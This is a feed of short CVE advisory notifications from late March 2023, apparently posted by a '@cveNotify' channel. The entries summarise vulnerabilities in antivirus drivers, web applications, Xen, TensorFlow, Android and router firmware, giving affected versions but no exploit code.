🚨 CVE-2023-1641A vulnerability, which was classified as problematic, has been found in IObit Malware Fighter 9.4.0.776. This issue affects the function 0x222018 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-224021 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-27 00:29:42 |
🚨 CVE-2023-1642A vulnerability, which was classified as problematic, was found in IObit Malware Fighter 9.4.0.776. Affected is the function 0x222034/0x222038/0x22203C/0x222040 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-224022 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-27 00:29:40 |
🚨 CVE-2023-1642A vulnerability, which was classified as problematic, was found in IObit Malware Fighter 9.4.0.776. Affected is the function 0x222034/0x222038/0x22203C/0x222040 in the library ObCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-224022 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-27 00:29:38 |
🚨 CVE-2023-1643A vulnerability has been found in IObit Malware Fighter 9.4.0.776 and classified as problematic. Affected by this vulnerability is the function 0x8001E000/0x8001E004/0x8001E018/0x8001E01C/0x8001E024/0x8001E040 in the library ImfHpRegFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224023.🎖@cveNotify |
|
| 2023-03-27 00:29:37 |
🚨 CVE-2023-1643A vulnerability has been found in IObit Malware Fighter 9.4.0.776 and classified as problematic. Affected by this vulnerability is the function 0x8001E000/0x8001E004/0x8001E018/0x8001E01C/0x8001E024/0x8001E040 in the library ImfHpRegFilter.sys of the component IOCTL Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224023.🎖@cveNotify |
|
| 2023-03-26 23:29:56 |
🚨 CVE-2021-4195Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Firmanet Software and Technology Customer Relation Manager allows XSS Targeting HTML Attributes.This issue affects Customer Relation Manager: before 2022.03.13.🎖@cveNotify |
|
| 2023-03-26 23:29:55 |
🚨 CVE-2022-23790Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Firmanet Software and Technology Customer Relation Manager allows Cross-Site Scripting (XSS).This issue affects Customer Relation Manager: before 2022.03.13.🎖@cveNotify |
|
| 2023-03-26 23:29:54 |
🚨 CVE-2023-1246Files or Directories Accessible to External Parties vulnerability in Saysis Starcities allows Collect Data from Common Resource Locations.This issue affects Starcities: through 1.3.🎖@cveNotify |
|
| 2023-03-26 23:29:50 |
🚨 CVE-2021-44196Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in UBIT Information Technologies Student Information Management System.This issue affects Student Information Management System: before 20211126.🎖@cveNotify |
|
| 2023-03-26 23:29:49 |
🚨 CVE-2021-44197Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in UBIT Information Technologies Student Information Management System.This issue affects Student Information Management System: before 20211126.🎖@cveNotify |
|
| 2023-03-26 23:29:48 |
🚨 CVE-2023-0839Improper Protection for Outbound Error Messages and Alert Signals vulnerability in ProMIS Process Co. InSCADA allows Account Footprinting.This issue affects inSCADA: before 20230115-1.🎖@cveNotify |
|
| 2023-03-26 23:29:44 |
🚨 CVE-2023-0577Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies SOBIAD allows Cross-Site Scripting (XSS).This issue affects SOBIAD: before 23.02.01.🎖@cveNotify |
|
| 2023-03-26 23:29:43 |
🚨 CVE-2021-45479Improper Neutralization of Input During Web Page Generation vulnerability in Yordam Information Technologies Library Automation System allows Stored XSS.This issue affects Library Automation System: before 19.2.🎖@cveNotify |
|
| 2023-03-26 23:29:42 |
🚨 CVE-2021-3855Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Liman Central Management System Liman MYS (HTTP/Controllers, CronMail, Jobs modules) allows Command Injection.This issue affects Liman Central Management System: from 1.7.0 before 1.8.3-462.🎖@cveNotify |
|
| 2023-03-26 23:29:38 |
🚨 CVE-2023-0882Improper Input Validation, Authorization Bypass Through User-Controlled Key vulnerability in Kron Tech Single Connect on Windows allows Privilege Abuse. This issue affects Single Connect: 2.16.🎖@cveNotify |
|
| 2023-03-26 23:29:37 |
🚨 CVE-2022-45088Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows PHP Local File Inclusion.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-03-26 23:29:36 |
🚨 CVE-2022-45090Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-03-26 21:29:37 |
🚨 CVE-2023-28858redis-py before 4.5.3, as used in ChatGPT and other products, leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a pipeline operation), and can send response data to the client of an unrelated request in an off-by-one manner. The fixed versions for this CVE Record are 4.3.6, 4.4.3, and 4.5.3; however, CVE-2023-28859 is a separate vulnerability.🎖@cveNotify |
|
| 2023-03-26 21:29:36 |
🚨 CVE-2023-28859redis-py through 4.5.3 leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a non-pipeline operation), and can send response data to the client of an unrelated request. NOTE: this issue exists because of an incomplete fix for CVE-2023-28858.🎖@cveNotify |
|
| 2023-03-26 19:29:47 |
🚨 CVE-2022-42331x86: speculative vulnerability in 32bit SYSCALL path Due to an oversight in the very original Spectre/Meltdown security work (XSA-254), one entrypath performs its speculation-safety actions too late. In some configurations, there is an unprotected RET instruction which can be attacked with a variety of speculative attacks.🎖@cveNotify |
|
| 2023-03-26 19:29:45 |
🚨 CVE-2022-42332x86 shadow plus log-dirty mode use-after-free In environments where host assisted address translation is necessary but Hardware Assisted Paging (HAP) is unavailable, Xen will run guests in so called shadow mode. Shadow mode maintains a pool of memory used for both shadow page tables as well as auxiliary data structures. To migrate or snapshot guests, Xen additionally runs them in so called log-dirty mode. The data structures needed by the log-dirty tracking are part of aformentioned auxiliary data. In order to keep error handling efforts within reasonable bounds, for operations which may require memory allocations shadow mode logic ensures up front that enough memory is available for the worst case requirements. Unfortunately, while page table memory is properly accounted for on the code path requiring the potential establishing of new shadows, demands by the log-dirty infrastructure were not taken into consideration. As a result, just established shadow page tables could be freed again immediately, while other code is still accessing them on the assumption that they would remain allocated.🎖@cveNotify |
|
| 2023-03-26 19:29:43 |
🚨 CVE-2022-42333x86/HVM pinned cache attributes mis-handling T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] To allow cachability control for HVM guests with passed through devices, an interface exists to explicitly override defaults which would otherwise be put in place. While not exposed to the affected guests themselves, the interface specifically exists for domains controlling such guests. This interface may therefore be used by not fully privileged entities, e.g. qemu running deprivileged in Dom0 or qemu running in a so called stub-domain. With this exposure it is an issue that - the number of the such controlled regions was unbounded (CVE-2022-42333), - installation and removal of such regions was not properly serialized (CVE-2022-42334).🎖@cveNotify |
|
| 2023-03-26 19:29:42 |
🚨 CVE-2022-42334x86/HVM pinned cache attributes mis-handling T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] To allow cachability control for HVM guests with passed through devices, an interface exists to explicitly override defaults which would otherwise be put in place. While not exposed to the affected guests themselves, the interface specifically exists for domains controlling such guests. This interface may therefore be used by not fully privileged entities, e.g. qemu running deprivileged in Dom0 or qemu running in a so called stub-domain. With this exposure it is an issue that - the number of the such controlled regions was unbounded (CVE-2022-42333), - installation and removal of such regions was not properly serialized (CVE-2022-42334).🎖@cveNotify |
|
| 2023-03-26 19:29:40 |
🚨 CVE-2022-23824IBPB may not prevent return branch predictions from being specified by pre-IBPB branch targets leading to a potential information disclosure.🎖@cveNotify |
|
| 2023-03-26 12:29:36 |
🚨 CVE-2023-1629A vulnerability classified as critical was found in JiangMin Antivirus 16.2.2022.418. Affected by this vulnerability is the function 0x222010 in the library kvcore.sys of the component IOCTL Handler. The manipulation leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224011.🎖@cveNotify |
|
| 2023-03-26 12:29:35 |
🚨 CVE-2023-1186A vulnerability has been found in FabulaTech Webcam for Remote Desktop 2.8.42 and classified as problematic. This vulnerability affects the function 0x222010/0x222018 in the library ftwebcam.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-222358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-26 06:29:45 |
🚨 CVE-2022-42331x86: speculative vulnerability in 32bit SYSCALL path Due to an oversight in the very original Spectre/Meltdown security work (XSA-254), one entrypath performs its speculation-safety actions too late. In some configurations, there is an unprotected RET instruction which can be attacked with a variety of speculative attacks.🎖@cveNotify |
|
| 2023-03-26 06:29:44 |
🚨 CVE-2022-42332x86 shadow plus log-dirty mode use-after-free In environments where host assisted address translation is necessary but Hardware Assisted Paging (HAP) is unavailable, Xen will run guests in so called shadow mode. Shadow mode maintains a pool of memory used for both shadow page tables as well as auxiliary data structures. To migrate or snapshot guests, Xen additionally runs them in so called log-dirty mode. The data structures needed by the log-dirty tracking are part of aformentioned auxiliary data. In order to keep error handling efforts within reasonable bounds, for operations which may require memory allocations shadow mode logic ensures up front that enough memory is available for the worst case requirements. Unfortunately, while page table memory is properly accounted for on the code path requiring the potential establishing of new shadows, demands by the log-dirty infrastructure were not taken into consideration. As a result, just established shadow page tables could be freed again immediately, while other code is still accessing them on the assumption that they would remain allocated.🎖@cveNotify |
|
| 2023-03-26 06:29:42 |
🚨 CVE-2022-42333x86/HVM pinned cache attributes mis-handling T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] To allow cachability control for HVM guests with passed through devices, an interface exists to explicitly override defaults which would otherwise be put in place. While not exposed to the affected guests themselves, the interface specifically exists for domains controlling such guests. This interface may therefore be used by not fully privileged entities, e.g. qemu running deprivileged in Dom0 or qemu running in a so called stub-domain. With this exposure it is an issue that - the number of the such controlled regions was unbounded (CVE-2022-42333), - installation and removal of such regions was not properly serialized (CVE-2022-42334).🎖@cveNotify |
|
| 2023-03-26 06:29:40 |
🚨 CVE-2022-42334x86/HVM pinned cache attributes mis-handling T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] To allow cachability control for HVM guests with passed through devices, an interface exists to explicitly override defaults which would otherwise be put in place. While not exposed to the affected guests themselves, the interface specifically exists for domains controlling such guests. This interface may therefore be used by not fully privileged entities, e.g. qemu running deprivileged in Dom0 or qemu running in a so called stub-domain. With this exposure it is an issue that - the number of the such controlled regions was unbounded (CVE-2022-42333), - installation and removal of such regions was not properly serialized (CVE-2022-42334).🎖@cveNotify |
|
| 2023-03-26 06:29:39 |
🚨 CVE-2022-48303GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.🎖@cveNotify |
|
| 2023-03-26 00:29:36 |
🚨 CVE-2023-1458** DISPUTED ** A vulnerability has been found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6 and classified as critical. Affected by this vulnerability is an unknown functionality of the component OSPF Handler. The manipulation of the argument area leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-223303. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.🎖@cveNotify |
|
| 2023-03-25 23:29:38 |
🚨 CVE-2023-1456** DISPUTED ** A vulnerability, which was classified as critical, has been found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. This issue affects some unknown processing of the component NAT Configuration Handler. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier VDB-223301 was assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.🎖@cveNotify |
|
| 2023-03-25 23:29:37 |
🚨 CVE-2023-1457** DISPUTED ** A vulnerability, which was classified as critical, was found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. Affected is an unknown function of the component Static Routing Configuration Handler. The manipulation of the argument next-hop-interface leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-223302 is the identifier assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.🎖@cveNotify |
|
| 2023-03-25 23:29:36 |
🚨 CVE-2023-1632** DISPUTED ** A vulnerability has been found in Ellucian Banner Web Tailor 8.6 and classified as critical. This vulnerability affects unknown code of the file /PROD_ar/twbkwbis.P_FirstMenu of the component Login Page. The manipulation of the argument PIDM/WEBID leads to improper authorization. The attack can be initiated remotely. After submitting proper login credentials it becomes possible to generate new valid session identifiers on the OTP page. The real existence of this vulnerability is still doubted at the moment. VDB-224014 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-25 21:29:36 |
🚨 CVE-2023-1635A vulnerability was found in OTCMS 6.72. It has been declared as problematic. Affected by this vulnerability is the function AutoRun of the file apiRun.php. The manipulation of the argument mode leads to cross site scripting. The attack can be launched remotely. The identifier VDB-224017 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-25 21:29:35 |
🚨 CVE-2016-15030A vulnerability classified as problematic has been found in Arno0x TwoFactorAuth. This affects an unknown part of the file login/login.php. The manipulation of the argument from leads to open redirect. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The name of the patch is 8549ad3cf197095f783643e41333586d6a4d0e54. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-223803.🎖@cveNotify |
|
| 2023-03-25 19:29:35 |
🚨 CVE-2023-1632A vulnerability has been found in Ellucian Banner Web Tailor 8.6 and classified as critical. This vulnerability affects unknown code of the file /PROD_ar/twbkwbis.P_FirstMenu of the component Login Page. The manipulation of the argument PIDM/WEBID leads to improper authorization. The attack can be initiated remotely. After submitting proper login credentials it becomes possible to generate new valid session identifiers on the OTP page. VDB-224014 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-25 14:29:42 |
🚨 CVE-2023-1626A vulnerability was found in Jianming Antivirus 16.2.2022.418. It has been declared as critical. This vulnerability affects unknown code in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to memory corruption. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224008.🎖@cveNotify |
|
| 2023-03-25 14:29:41 |
🚨 CVE-2023-1627A vulnerability was found in Jianming Antivirus 16.2.2022.418. It has been rated as problematic. This issue affects some unknown processing in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier VDB-224009 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-25 14:29:39 |
🚨 CVE-2023-1628A vulnerability classified as problematic has been found in Jianming Antivirus 16.2.2022.418. Affected is an unknown function in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224010 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-25 14:29:38 |
🚨 CVE-2023-1630A vulnerability, which was classified as problematic, has been found in Jianming Antivirus 16.2.2022.418. Affected by this issue is some unknown functionality in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224012.🎖@cveNotify |
|
| 2023-03-25 14:29:36 |
🚨 CVE-2023-1631A vulnerability, which was classified as problematic, was found in Jianming Antivirus 16.2.2022.418. This affects an unknown part in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-224013 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-25 12:29:37 |
🚨 CVE-2023-1629A vulnerability classified as critical was found in Jianming Antivirus 16.2.2022.418. Affected by this vulnerability is an unknown functionality in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224011.🎖@cveNotify |
|
| 2023-03-25 06:29:51 |
🚨 CVE-2023-25668TensorFlow is an open source platform for machine learning. Attackers using Tensorflow prior to 2.12.0 or 2.11.1 can access heap memory which is not in the control of user, leading to a crash or remote code execution. The fix will be included in TensorFlow version 2.12.0 and will also cherrypick this commit on TensorFlow version 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:50 |
🚨 CVE-2023-25669TensorFlow is an open source platform for machine learning. Prior to versions 2.12.0 and 2.11.1, if the stride and window size are not positive for `tf.raw_ops.AvgPoolGrad`, it can give a floating point exception. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:46 |
🚨 CVE-2023-25670TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 have a null point error in QuantizedMatMulWithBiasAndDequantize with MKL enabled. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:45 |
🚨 CVE-2023-25671TensorFlow is an open source platform for machine learning. There is out-of-bounds access due to mismatched integer type sizes. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:44 |
🚨 CVE-2023-25673TensorFlow is an open source platform for machine learning. Versions prior to 2.12.0 and 2.11.1 have a Floating Point Exception in TensorListSplit with XLA. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:43 |
🚨 CVE-2023-25674TensorFlow is an open source machine learning platform. Versions prior to 2.12.0 and 2.11.1 have a null pointer error in RandomShuffle with XLA enabled. A fix is included in TensorFlow 2.12.0 and 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:39 |
🚨 CVE-2023-25675TensorFlow is an open source machine learning platform. When running versions prior to 2.12.0 and 2.11.1 with XLA, `tf.raw_ops.Bincount` segfaults when given a parameter `weights` that is neither the same shape as parameter `arr` nor a length-0 tensor. A fix is included in TensorFlow 2.12.0 and 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:38 |
🚨 CVE-2023-25801TensorFlow is an open source machine learning platform. Prior to versions 2.12.0 and 2.11.1, `nn_ops.fractional_avg_pool_v2` and `nn_ops.fractional_max_pool_v2` require the first and fourth elements of their parameter `pooling_ratio` to be equal to 1.0, as pooling on batch and channel dimensions is not supported. A fix is included in TensorFlow 2.12.0 and 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:37 |
🚨 CVE-2023-27579TensorFlow is an end-to-end open source platform for machine learning. Constructing a tflite model with a paramater `filter_input_channel` of less than 1 gives a FPE. This issue has been patched in version 2.12. TensorFlow will also cherrypick the fix commit on TensorFlow 2.11.1.🎖@cveNotify |
|
| 2023-03-25 06:29:36 |
🚨 CVE-2023-28437Dataease is an open source data visualization and analysis tool. The blacklist for SQL injection protection is missing entries. This vulnerability has been fixed in version 1.18.5. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-25 01:29:50 |
🚨 CVE-2023-27042Tenda AX3 V16.03.12.11 is vulnerable to Buffer Overflow via /goform/SetFirewallCfg.🎖@cveNotify |
|
| 2023-03-25 01:29:49 |
🚨 CVE-2023-24258SPIP v4.1.5 and earlier was discovered to contain a SQL injection vulnerability via the _oups parameter. This vulnerability allows attackers to execute arbitrary code via a crafted POST request.🎖@cveNotify |
|
| 2023-03-25 01:29:48 |
🚨 CVE-2022-24197iText v7.1.17 was discovered to contain a stack-based buffer overflow via the component ByteBuffer.append, which allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.🎖@cveNotify |
|
| 2023-03-25 01:29:47 |
🚨 CVE-2023-1583A NULL pointer dereference was found in io_file_bitmap_get in io_uring/filetable.c in the io_uring sub-component in the Linux Kernel. When fixed files are unregistered, some context information (file_alloc_{start,end} and alloc_hint) is not cleared. A subsequent request that has auto index selection enabled via IORING_FILE_INDEX_ALLOC can cause a NULL pointer dereference. An unprivileged user can use the flaw to cause a system crash.🎖@cveNotify |
|
| 2023-03-25 01:29:46 |
🚨 CVE-2023-26864SQL injection vulnerability found in PrestaShop smplredirectionsmanager v.1.1.19 and before allow a remote attacker to gain privileges via the SmplTools::getMatchingRedirectionsFromPartscomponent.🎖@cveNotify |
|
| 2023-03-25 01:29:45 |
🚨 CVE-2023-27055Aver Information Inc PTZApp2 v20.01044.48 allows attackers to access sensitive files via a crafted GET request.🎖@cveNotify |
|
| 2023-03-25 01:29:43 |
🚨 CVE-2023-28150An issue was discovered in Independentsoft JODF before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.🎖@cveNotify |
|
| 2023-03-25 01:29:42 |
🚨 CVE-2022-24196iText v7.1.17, up to (exluding)": 7.1.18 and 7.2.2 was discovered to contain an out-of-memory error via the component readStreamBytesRaw, which allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.🎖@cveNotify |
|
| 2023-03-25 01:29:41 |
🚨 CVE-2021-43113iTextPDF in iText 7 and up to (excluding 4.4.13.3) 7.1.17 allows command injection via a CompareTool filename that is mishandled on the gs (aka Ghostscript) command line in GhostscriptHelper.java.🎖@cveNotify |
|
| 2023-03-24 23:29:58 |
🚨 CVE-2023-20979In BtaAvCo::GetNextSourceDataPacket of bta_av_co.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-259939364🎖@cveNotify |
|
| 2023-03-24 23:29:57 |
🚨 CVE-2023-21001In onContextItemSelected of NetworkProviderSettings.java, there is a possible way for users to change the Wi-Fi settings of other users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-237672190🎖@cveNotify |
|
| 2023-03-24 23:29:56 |
🚨 CVE-2023-21021In isTargetSdkLessThanQOrPrivileged of WifiServiceImpl.java, there is a possible way for the guest user to change admin user network settings due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-255537598🎖@cveNotify |
|
| 2023-03-24 23:29:52 |
🚨 CVE-2023-21025In ufdt_local_fixup_prop of ufdt_overlay.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-254929746🎖@cveNotify |
|
| 2023-03-24 23:29:51 |
🚨 CVE-2023-21042In (TBD) of (TBD), there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239873326References: N/A🎖@cveNotify |
|
| 2023-03-24 23:29:50 |
🚨 CVE-2023-21046In ConvertToHalMetadata of aidl_utils.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-253424924References: N/A🎖@cveNotify |
|
| 2023-03-24 23:29:47 |
🚨 CVE-2023-21060In sms_GetTpPiIe of sms_PduCodec.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-253770924References: N/A🎖@cveNotify |
|
| 2023-03-24 23:29:46 |
🚨 CVE-2023-21062In DoSetTempEcc of imsservice.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243376770References: N/A🎖@cveNotify |
|
| 2023-03-24 23:29:45 |
🚨 CVE-2023-21064In DoSetPinControl of miscservice.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243130078References: N/A🎖@cveNotify |
|
| 2023-03-24 23:29:41 |
🚨 CVE-2023-21068In (TBD) of (TBD), there is a possible way to boot with a hidden debug policy due to a missing warning to the user. This could lead to local escalation of privilege after preparing the device, hiding the warning, and passing the phone to a new user, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243433344References: N/A🎖@cveNotify |
|
| 2023-03-24 23:29:40 |
🚨 CVE-2023-21075In get_svc_hash of nan.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-261857862References: N/A🎖@cveNotify |
|
| 2023-03-24 21:29:59 |
🚨 CVE-2022-36429A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-24 21:29:58 |
🚨 CVE-2022-37337A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-24 21:29:57 |
🚨 CVE-2023-27980A CWE-306: Missing Authentication for Critical Function vulnerability exists in the Data Server TCP interface that could allow the creation of a malicious report file in the IGSS project report directory, this could lead to remote code execution when a victim eventually opens the report. Affected Products: IGSS Data Server(IGSSdataServer.exe)(V16.0.0.23040 and prior), IGSS Dashboard(DashBoard.exe)(V16.0.0.23040 and prior), Custom Reports(RMS16.dll)(V16.0.0.23040 and prior)🎖@cveNotify |
|
| 2023-03-24 21:29:56 |
🚨 CVE-2023-24080A lack of rate limiting on the password reset endpoint of Chamberlain myQ v5.222.0.32277 (on iOS) allows attackers to compromise user accounts via a bruteforce attack.🎖@cveNotify |
|
| 2023-03-24 21:29:52 |
🚨 CVE-2022-36804Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.🎖@cveNotify |
|
| 2023-03-24 21:29:51 |
🚨 CVE-2023-1500A vulnerability, which was classified as problematic, has been found in code-projects Simple Art Gallery 1.0. Affected by this issue is some unknown functionality of the file adminHome.php. The manipulation of the argument about_info leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223400.🎖@cveNotify |
|
| 2023-03-24 21:29:50 |
🚨 CVE-2015-10096A vulnerability, which was classified as critical, was found in Zarthus IRC Twitter Announcer Bot up to 1.1.0. This affects the function get_tweets of the file lib/twitterbot/plugins/twitter_announcer.rb. The manipulation of the argument tweet leads to command injection. It is possible to initiate the attack remotely. Upgrading to version 1.1.1 is able to address this issue. The name of the patch is 6b1941b7fc2c70e1f40981b43c84a2c20cc12bd3. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-223383.🎖@cveNotify |
|
| 2023-03-24 21:29:49 |
🚨 CVE-2023-27873IBM Aspera Faspex 4.4.2 could allow a remote authenticated attacker to obtain sensitive credential information using specially crafted XML input. IBM X-Force ID: 249654.🎖@cveNotify |
|
| 2023-03-24 21:29:45 |
🚨 CVE-2022-4933A vulnerability, which was classified as critical, has been found in ATM Consulting dolibarr_module_quicksupplierprice up to 1.1.6. Affected by this issue is the function upatePrice of the file script/interface.php. The manipulation leads to sql injection. The attack may be launched remotely. Upgrading to version 1.1.7 is able to address this issue. The name of the patch is ccad1e4282b0e393a32fcc852e82ec0e0af5446f. It is recommended to upgrade the affected component. VDB-223382 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-24 21:29:44 |
🚨 CVE-2023-27871IBM Aspera Faspex 4.4.2 could allow a remote attacker to obtain sensitive credential information for an external user, using a specially crafted SQL query. IBM X-Force ID: 249613.🎖@cveNotify |
|
| 2023-03-24 21:29:43 |
🚨 CVE-2023-1248Improper Input Validation vulnerability in OTRS AG OTRS (Ticket Actions modules), OTRS AG ((OTRS)) Community Edition (Ticket Actions modules) allows Cross-Site Scripting (XSS).This issue affects OTRS: from 7.0.X before 7.0.42; ((OTRS)) Community Edition: from 6.0.1 through 6.0.34.🎖@cveNotify |
|
| 2023-03-24 21:29:42 |
🚨 CVE-2023-1250Improper Input Validation vulnerability in OTRS AG OTRS (ACL modules), OTRS AG ((OTRS)) Community Edition (ACL modules) allows Local Execution of Code. When creating/importing an ACL it was possible to inject code that gets executed via manipulated comments and ACL-names This issue affects OTRS: from 7.0.X before 7.0.42, from 8.0.X before 8.0.31; ((OTRS)) Community Edition: from 6.0.1 through 6.0.34.🎖@cveNotify |
|
| 2023-03-24 21:29:39 |
